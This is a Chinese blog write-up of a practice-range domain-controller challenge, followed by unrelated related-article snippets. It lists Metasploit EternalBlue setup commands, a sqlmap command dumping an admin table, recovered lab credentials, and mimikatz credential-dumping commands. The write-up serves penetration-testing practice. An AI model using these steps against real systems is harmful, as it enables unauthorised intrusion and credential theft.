云尘靶场-铁三域控

news2024/12/25 12:15:33

第一次

通过vpn链接 然后fscan扫描c段

扫描出来三个ip存活 并且141存在永恒之蓝

我们看看能不能直接复现

按照原本的设置发现 提示这里需要通过32位来进行

那我们开始设置

利用MS17-010渗透win7(32位)_利用ms17-010渗透win7(32位)-CSDN博客

https://github.com/1stPeak/Eternalblue-Doublepulsar-Metasploit-master

通过上面进行下载

然后修改解压后的文件夹名字为 Eternalblue-Doublepulsar-Metasploit

然后将内容设置在 /root 目录下

进入文件夹

cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb

复制到msf的payload中

然后开始设置32位kali

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

wine cmd.exe

这里就设置完毕了

 然后我们开始利用

use exploit/windows/smb/eternalblue_doublepulsar

set payload

set RHOST ip

set LHOST kali的ip

run 

利用失败 不知道

于是我们开始看其他的吧 我们可以发现123 开放了 80端口

去访问看看

织梦cms 是有洞的

首先不知道登录界面 我们开始扫目录

这里sql文件我们去访问

SQL注入

发现存在查询 很明显的注入

然后访问即可

 获取了flag2 但是flag1 去哪里了

我们继续看

看了别人的poc

都是在这种目录下 我们去访问一下dede

试试看弱口令

 这里还有一个 就是sql注入查看

-u http://172.25.0.123/sql/index.php?id=2 -D dedecmsv57utf8sp1 -T topsec_admin --dump

 MD5解密

然后我们测试的时候发现存在一个文件上传点

那我们写个🐎咯

发现并不需要 直接返回上一级就有了

这台机子就没东西了 因为没有其他内网了 所以我们还是需要通过永恒之蓝实现。。。。

去安装一下32位复现一下吧。。。。。

32位永恒之蓝(失败)

每次测试都是这样 所以我都在怀疑是我自己的问题还是环境的问题 于是我去虚拟机创建一个32位的win7测试

裂开 自己的环境可以实现。。。。 奇了怪了。。。

多半是环境的问题了。。。。

看了下面师傅们的评论

发现

检测也不行。。。

看wp咯

发现永恒之蓝不行了 但是我们sql的时候存在一个账号密码

有点类似win的账号密码 我们去看看

[16:48:24] [INFO] retrieved: administrator
[16:48:24] [INFO] retrieved: topsec.123

上了上了!!!!!

然后就G了没金币了 明天再来吧

第二次

第二次打开靶场开始链接 ok上不去了!!!!

是我的问题吗。。。。。

然后发现

其他用户 输入 administrator topsec.123就进去了。。。

发现了其他的域 那我们肯定就是要去看这个了

首先fscan上去扫一下咯

如何传文件搜一下就行了 会打开共享 然后就可以了

然后我们去扫描一下 上传32位的fscan

确实发现了就这两个电脑 我们要如何远控呢

这里看了桌面存在一个win32 我们进去看看

这个在vol见过 可以直接获取windows密码

我们使用看看

mimikatz # log
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

 但是最后我获取不到password 我也不知道为什么了

第二次靶场也结束了明天看看吧

第三次

实在解不出来

看了wp 获取了密码

不知道为什么 我的ssp 不存在

原本还想通过永恒之蓝 但是无法实现(太菜了)

获取了flag

不是很难 但是复现的问题很多 自己也不知道怎么实现

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1136221.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

外汇天眼:MT4白标与MT5,谁更适合如今的外汇市场?

2017年4月,外汇市场因迈达克的官宣闹得沸沸扬扬。 俄罗斯知名软件提供商迈达克(MetaQuotes)宣布停止出售旗下产品MT4的主标业务,意在淘汰MT4软件,转而主推MT5平台。 对于计划成为经纪商的人来说,是选择快速…

个人记账理财软件 Money Pro mac中文版软件介绍

Money Pro for mac是一款综合性高的理财工具,Money Pro是一套能够协同工作的工具,可用来追踪账户、管理账单以及制作预算,您可以为每个时间段设置不同的预算限值。财务一切尽在掌控之中。 Money Pro for mac软件介绍 Money Pro for mac提供一…

常见深度学习目标检测指标 AP mAP mAP@0.5 mAP@0.5:0.95 简短总结

目标检测指标计算 准确率 召回率 AP mAP 1.准确率与召回率 TP 真正例 将正类预测为正类数 FP 假正例 将负类预测为正类数 误检 TN 真负例 将负类预测为负类 FN 假负例 将正类预测为负类 漏检 2.AP 通常情况下 P与R成反比 因此为了更好的衡量模型 引入 AP mAP AP为…

学会场景提问,让AI“小助手”为我所用

文章目录 一、故事叙述提问举例 二、产品描述提问举例 三、报告撰写提问举例 四、邮件和信件撰写提问举例 五、新间稿和公告撰写提问举例 六、学术论文和专业文章撰写提问举例 我们知道AI技术不仅能够自动生成文章和内容,还可以根据我们的需求提供创意灵感和解决问题…

uni-app配置微信开发者工具

一、配置微信开发者工具路径 工具->设置->运行配置->小程序运行配置->微信开发者工具路径 二、微信开发者工具开启服务端口

OpenWRT软路由web界面如何远程访问?

文章目录 1.openWRT安装cpolar2.配置远程访问地址3.固定公网地址 简单几步实现在公网环境下远程访问openWRT web 管理界面,使用cpolar内网穿透创建安全隧道映射openWRT web 界面面板443端口,无需公网IP,无需设置路由器。 1.openWRT安装cpola…

buuctf[强网杯 2019]随便注 1(超详细,三种解法)

第一种解法 堆叠注入 网页环境判断是否是字符型注入1判断是否存在关键字过滤select联合查询被过滤,只能用堆叠注入了查看有几个字段1 order by 2#正常回显1 order by 3#回显报错,可以看出只有两个字段查看所有数据库1; show databases;查看所有数据表1;…

python,pandas ,openpyxl提取excel特定数据,合并单元格合并列,设置表格格式,设置字体颜色,

python,pandas ,openpyxl提取excel特定数据,合并单元格合并列,设置表格格式,设置字体颜色, 代码 import osimport numpy import pandas as pd import openpyxl from openpyxl.styles import Font from op…

数字音频工作站软件 Ableton Live 11 mac中文软件特点与功能

Ableton Live 11 mac是一款数字音频工作站软件,用于音乐制作、录音、混音和现场演出。它由Ableton公司开发,是一款极其流行的音乐制作软件之一。 Ableton Live 11 mac软件特点和功能 Comping功能:Live 11增加了Comping功能,允许用…

详解:飞讯是如何助力集团型制造企业实现数字化转型的

飞讯软件成立17年来,成功服务了上百家自动化装备及零部件制造企业,对这类企业的业务特点和痛点非常熟悉。在解决企业数字化转型挑战方面,我们拥有丰富的经验和技术平台优势。因此,于2022年我们与东莞一家大型自动化装备制造企业正…

Fuzz测试:自动化测试软件隐患和漏洞的秘密武器

0x01 什么是模糊测试 模糊测试(Fuzz Testing)是一种广泛用于软件安全和质量测试的自动化测试方法。它的基本思想是向输入参数或数据中注入随机、不规则或异常的数据,以检测目标程序或系统在处理不合法、不正常或边缘情况下的行为。模糊测试通…

Egg.js使用MySql数据库

最近在接手一个项目,vuenuxtegg,我也是刚开始学习egg.js,所以会将自己踩的坑都记录下来。 安装mysql 使用sequelize连接数据库,首先安装egg-sequelize和mysql2。 npm install --save egg-sequelize mysql2打开package.json文件…

优思学院|中质协六西格玛考试形式是什么样的?

中质协的考试形式主要为单选和多选题,近年也有加了一小部分填空题,和国际认证考试有很大区别,因为美质协(ASQ)、国际精益六西格玛研究所(ILSSI),又或者著名的PMP项目管理认证等都是采…

day51 --动态规划10

121. 买卖股票的最佳时机 122.买卖股票的最佳时机II 第一题:买卖股票的最佳时机 给定一个数组 prices ,它的第 i 个元素 prices[i] 表示一支给定股票第 i 天的价格。 你只能选择 某一天 买入这只股票,并选择在 未来的某一个不同的日子 卖出…

Phthon下载库函数

在代码中使用import tushare as ts导入时编译会报错找不到tushare,此时则表示本地没有相应的库函数包 打开安装python的目录,找到pip.exe文件目录,例如D:\Python\Python311\Scripts,文件夹右键->在终端打开,输入pi…

RPC远程调用加密方法获取返回值

前言 从混淆的加密JS中还原了加密参数的具体生成流程,结果想从JS转python的过程中第一步就卡住了。开头密钥JS代码如下,但是水平有限不知道如何转为python实现(如果有大佬知道希望可以评论指点)。利用execjsjsdom来执行简化还原后的JS代码依旧无法实现。…

云游数智农业世界,体验北斗时空智能

今日,2023年中国国际农业机械展览会在武汉正式拉开帷幕,众多与会者云集,各类农机产品纷呈,盛况空前。 千寻位置作为国家北斗地基增强系统的建设与运营方,在中国国际农业机械展览会上亮相,以「北斗时空智能 …

基于pyenv和virtualenv搭建python多版本虚拟环境

pyenv简介 由于Python的依赖是基于site的,这对于生产环境来说,是一种简单而正确的方式,然而,对于我们的开发环境,基于这样的管理方式,带来了可怕的第三方依赖管理的难题,virtualenv适时出现了&a…

【AICFD案例教程】锥形燃烧器燃烧仿真

AICFD是由天洑软件自主研发的通用智能热流体仿真软件,用于高效解决能源动力、船舶海洋、电子设备和车辆运载等领域复杂的流动和传热问题。软件涵盖了从建模、仿真到结果处理完整仿真分析流程,帮助工业企业建立设计、仿真和优化相结合的一体化流程&#x…

Linux入门攻坚——5、find,locate,特殊权限,磁盘管理初识

文件查找:在文件系统上查找符合条件的文件。 工具:locate——非实时查找(数据库查找,基于索引,索引需要维护,有间隔,所以有不一致的情况存在)。find——实时查找 locate&#xff1…